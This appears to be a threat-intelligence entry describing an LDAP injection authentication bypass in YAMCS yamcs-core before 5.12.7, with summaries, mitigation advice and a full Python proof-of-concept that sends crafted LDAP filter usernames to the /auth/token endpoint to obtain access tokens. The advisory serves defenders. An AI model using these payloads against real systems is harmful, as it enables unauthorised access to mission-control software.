YAMCS yamcs-core 5.12.7 - LDAP Injection
YAMCS yamcs-core versions prior to 5. 12. 7 are vulnerable to an LDAP Injection vulnerability. This issue allows an attacker to manipulate LDAP queries, potentially leading to unauthorized access or information disclosure. The vulnerability affects Linux platforms and has known exploit code written in Python. No official patch link is provided, and no known exploits are reported in the wild. The severity is assessed as medium based on the available information.
AI Analysis
Technical Summary
YAMCS yamcs-core versions before 5.12.7 contain an LDAP Injection vulnerability (CVE-2026-42568) that allows attackers to inject malicious input into LDAP queries. This can compromise the integrity of LDAP operations, potentially enabling unauthorized access or data leakage. The vulnerability affects Linux deployments of the software. Exploit code is publicly available in Python, indicating the vulnerability is exploitable. No official patch or remediation details are provided in the available data.
Potential Impact
Exploitation of this LDAP Injection vulnerability could allow attackers to manipulate LDAP queries, potentially leading to unauthorized access or information disclosure within affected YAMCS yamcs-core installations. The exact impact depends on the deployment and LDAP usage context.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory at https://yamcs.org for current remediation guidance. Until an official fix is available, avoid exposing vulnerable versions to untrusted users or networks. Monitor vendor communications for updates.
Indicators of Compromise
- exploit-code: # Exploit Title: YAMCS yamcs-core 5.12.7 - LDAP Injection # Date: 2026-05-27 # Exploit Author: Daniel Miranda Barcelona (Excal1bur) # Vendor Homepage: https://yamcs.org # Software Link: https://github.com/yamcs/yamcs # Version: < 5.12.7 # Tested on: Linux # CVE: CVE-2026-42568 # Category: Remote / Auth Bypass # Advisory: https://github.com/yamcs/yamcs/security/advisories/GHSA-cqh3-jg8p-336j #!/usr/bin/env python3 """ CVE-2026-42568 — YAMCS LDAP Injection in LdapAuthModule ========================================================= The username parameter in LdapAuthModule is inserted directly into LDAP search filters without RFC 4515 escaping. Root cause (LdapAuthModule.java): var filter = userFilter.replace("{0}", username); With userFilter=(uid={0}) and username=*)(uid=*))(|(uid=* Result: (uid=*)(uid=*))(|(uid=*) — universal match, auth bypass. Only affects instances with LdapAuthModule configured. ========================================================= """ import requests import sys import json def main(): target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8090" base = target.rstrip("/") print("=" * 65) print(" CVE-2026-42568 — YAMCS LDAP Injection PoC") print(f" Target: {target}") print(" Requires: LdapAuthModule configured in yamcs.yaml") print("=" * 65) payloads = [ { "name": "Universal bypass", "username": "*)(uid=*))(|(uid=*", "password": "anything", }, { "name": "Targeted bypass (admin)", "username": "admin)(|(objectClass=*", "password": "wrongpassword", }, { "name": "Wildcard match", "username": "op*", "password": "anything", } ] for i, p in enumerate(payloads, 1): print(f"\n[{i}] {p['name']}") print(f" username: {p['username']}") print(f" password: {p['password']}") try: resp = requests.post(f"{base}/auth/token", data={ "grant_type": "password", "username": p["username"], "password": p["password"] }, timeout=5) print(f" HTTP: {resp.status_code}") if resp.status_code == 200: token = resp.json().get("access_token", "") print(f" [!!!] AUTH BYPASSED") if token: print(f" [!!!] Token: {token[:50]}...") elif resp.status_code == 401: print(f" [-] 401 — LDAP may not be configured") elif resp.status_code == 403: print(f" [+] 403 — Patched or LDAP disabled") except requests.exceptions.ConnectionError: print(f" [-] Connection refused — is YAMCS running?") except Exception as e: print(f" [-] Error: {e}") print("\n" + "=" * 65) print(" Fix: Upgrade to yamcs-core >= 5.12.7") print("=" * 65) if __name__ == "__main__": main()
YAMCS yamcs-core 5.12.7 - LDAP Injection
Description
YAMCS yamcs-core versions prior to 5. 12. 7 are vulnerable to an LDAP Injection vulnerability. This issue allows an attacker to manipulate LDAP queries, potentially leading to unauthorized access or information disclosure. The vulnerability affects Linux platforms and has known exploit code written in Python. No official patch link is provided, and no known exploits are reported in the wild. The severity is assessed as medium based on the available information.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
YAMCS yamcs-core versions before 5.12.7 contain an LDAP Injection vulnerability (CVE-2026-42568) that allows attackers to inject malicious input into LDAP queries. This can compromise the integrity of LDAP operations, potentially enabling unauthorized access or data leakage. The vulnerability affects Linux deployments of the software. Exploit code is publicly available in Python, indicating the vulnerability is exploitable. No official patch or remediation details are provided in the available data.
Potential Impact
Exploitation of this LDAP Injection vulnerability could allow attackers to manipulate LDAP queries, potentially leading to unauthorized access or information disclosure within affected YAMCS yamcs-core installations. The exact impact depends on the deployment and LDAP usage context.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory at https://yamcs.org for current remediation guidance. Until an official fix is available, avoid exposing vulnerable versions to untrusted users or networks. Monitor vendor communications for updates.
Technical Details
- Cve
- CVE-2026-42568
- Version
- < 5.12.7
- Vendor
- https://yamcs.org
- Application
- https://github.com/yamcs/yamcs
- Author
- Daniel Miranda Barcelona
- Platform
- Linux
- Edb Id
- 52603
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for YAMCS yamcs-core 5.12.7 - LDAP Injection
# Exploit Title: YAMCS yamcs-core 5.12.7 - LDAP Injection # Date: 2026-05-27 # Exploit Author: Daniel Miranda Barcelona (Excal1bur) # Vendor Homepage: https://yamcs.org # Software Link: https://github.com/yamcs/yamcs # Version: < 5.12.7 # Tested on: Linux # CVE: CVE-2026-42568 # Category: Remote / Auth Bypass # Advisory: https://github.com/yamcs/yamcs/security/advisories/GHSA-cqh3-jg8p-336j #!/usr/bin/env python3 """ CVE-2026-42568 — YAMCS LDAP Injection in LdapAuthModule ====================... (2573 more characters)
Threat ID: 6a1b58ece29bf47b508cc701
Added to database: 5/30/2026, 9:38:52 PM
Last enriched: 5/30/2026, 9:39:08 PM
Last updated: 5/31/2026, 3:26:56 AM
Views: 10
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.